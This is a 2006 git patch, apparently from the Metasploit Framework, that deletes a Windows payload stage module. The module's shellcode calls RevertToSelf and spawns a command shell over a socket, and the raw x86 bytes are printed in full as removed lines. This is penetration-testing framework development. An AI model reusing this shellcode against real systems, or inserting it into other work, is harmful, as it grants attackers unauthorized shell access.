From b011d080b389f852de8678338e583df64ea0f31f Mon Sep 17 00:00:00 2001 From: vlad902 <> Date: Sun, 8 Jan 2006 03:26:41 +0000 Subject: [PATCH] No stagers can use this git-svn-id: file:///home/svn/incoming/trunk@3344 4d416f70-5f16-0410-b530-b9f4589650da --- .../payloads/stages/windows/shell_revert.rb | 49 ------------------- 1 file changed, 49 deletions(-) delete mode 100644 modules/payloads/stages/windows/shell_revert.rb diff --git a/modules/payloads/stages/windows/shell_revert.rb b/modules/payloads/stages/windows/shell_revert.rb deleted file mode 100644 index 28efffe729..0000000000 --- a/modules/payloads/stages/windows/shell_revert.rb +++ /dev/null @@ -1,49 +0,0 @@ -require 'msf/core' - -module Msf -module Payloads -module Stages -module Windows - -module Shell - - include Msf::Payload::Windows - - def initialize(info = {}) - super(merge_info(info, - 'Name' => 'Windows RevertToSelf Command Shell', - 'Version' => '$Revision$', - 'Description' => 'Call RevertToSelf and spawn a command shell', - 'Author' => 'hdm', - 'Platform' => 'win', - 'Arch' => ARCH_X86, - 'Session' => Msf::Sessions::CommandShell, - 'PayloadCompat' => - { - 'Convention' => 'sockedi', - 'SymbolLookup' => 'ebp', - }, - 'Stage' => - { - 'Offsets' => - { - 'EXITFUNC' => [ 103 + 28, 'V' ] - }, - 'Payload' => - "\xe8\x09\x00\x00\x00\x41\x44\x56\x41\x50\x49\x33\x32\x00\xff\x55" + - "\x08\x50\x68\x2a\xc8\xde\x50\xff\x55\x04\xff\xd0" + - "\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24\xac\x6a" + - "\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66\xc7" + - "\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c\x24" + - "\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x53" + - "\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89\xe6" + - "\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff\xff" + - "\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31\xdb" + - "\x53\xff\xd0" - } - )) - end - -end - -end end end end